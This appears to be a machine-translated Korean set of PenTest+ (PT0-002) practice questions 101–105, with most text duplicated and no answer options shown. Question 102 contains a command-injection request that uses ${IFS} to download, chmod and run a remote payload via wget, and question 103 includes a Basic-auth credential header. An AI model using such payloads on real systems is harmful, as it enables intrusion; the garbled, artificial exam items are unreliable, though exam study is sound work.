PT0-002 문제 101
참여하는 동안 침투 테스터는 파일 내에서 다음 문자열 목록을 발견했습니다.
문자열의 알려진 일반 텍스트를 결정하는 가장 좋은 기술은 다음 중 무엇입니까?
문자열의 알려진 일반 텍스트를 결정하는 가장 좋은 기술은 다음 중 무엇입니까?
PT0-002 문제 102
침투 테스터가 익스플로잇을 사용하여 시스템에 액세스할 수 있었습니다. 다음은 사용된 코드 스니펫입니다.
익스플로잇 = "포스트"
익스플로잇 += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;$ {IFS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" 다음 중 침투 테스터가 참여 후 실행해야 하는 명령은 무엇입니까?
익스플로잇 = "포스트"
익스플로잇 += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;$ {IFS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" 다음 중 침투 테스터가 참여 후 실행해야 하는 명령은 무엇입니까?
PT0-002 문제 103
침투 테스터는 최근 기업 환경 내에서 핵심 네트워크 장치의 보안에 대한 검토를 완료했습니다. 주요 결과는 다음과 같습니다.
* 네트워크 장치로 이동하는 다음 요청이 차단되었습니다.
GET /로그인 HTTP/1.1
호스트: 10.50.100.16
사용자 에이전트: Mozilla/5.0(X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
허용 언어: en-US,en;q=0.5
연결: 연결 유지
승인: 기본 WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* 네트워크 관리 인터페이스는 프로덕션 네트워크에서 사용할 수 있습니다.
* Nmap 스캔은 다음을 반환했습니다.
다음 중 최종 보고서의 권장 사항 섹션에 추가하는 것이 가장 좋은 것은 무엇입니까? (두 가지를 선택하세요.)
* 네트워크 장치로 이동하는 다음 요청이 차단되었습니다.
GET /로그인 HTTP/1.1
호스트: 10.50.100.16
사용자 에이전트: Mozilla/5.0(X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
허용 언어: en-US,en;q=0.5
연결: 연결 유지
승인: 기본 WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* 네트워크 관리 인터페이스는 프로덕션 네트워크에서 사용할 수 있습니다.
* Nmap 스캔은 다음을 반환했습니다.
다음 중 최종 보고서의 권장 사항 섹션에 추가하는 것이 가장 좋은 것은 무엇입니까? (두 가지를 선택하세요.)
PT0-002 문제 104
간헐적인 연결 문제가 보고된 후 컨설턴트가 다음 출력을 검토하고 있습니다.
? (192.168.1.1) en0 ifscope [이더넷]의 0a:d1:fa:b1:01:67에서
? (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [이더넷]
? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [이더넷]
? en0 ifscope [이더넷]의 88:de:a9:12:ce:fb에서 (192.168.1.34)
? (192.168.1.136) en0 ifscope [이더넷]의 0a:d1:fa:b1:01:67에서
? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [이더넷]
? (224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope 영구 [이더넷]
? (239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope 영구 [이더넷]
다음 중 컨설턴트가 보고할 가능성이 가장 높은 것은 무엇입니까?
? (192.168.1.1) en0 ifscope [이더넷]의 0a:d1:fa:b1:01:67에서
? (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [이더넷]
? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [이더넷]
? en0 ifscope [이더넷]의 88:de:a9:12:ce:fb에서 (192.168.1.34)
? (192.168.1.136) en0 ifscope [이더넷]의 0a:d1:fa:b1:01:67에서
? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [이더넷]
? (224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope 영구 [이더넷]
? (239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope 영구 [이더넷]
다음 중 컨설턴트가 보고할 가능성이 가장 높은 것은 무엇입니까?
PT0-002 문제 105
침투 테스터가 기본 구성으로 Windows 서버에서 낮은 권한 셸을 얻었고 이제 잘못 구성된 서비스 권한을 악용할 수 있는 기능을 탐색하려고 합니다. 다음 중 테스터가 이 프로세스를 시작하는 데 도움이 되는 명령은 무엇입니까?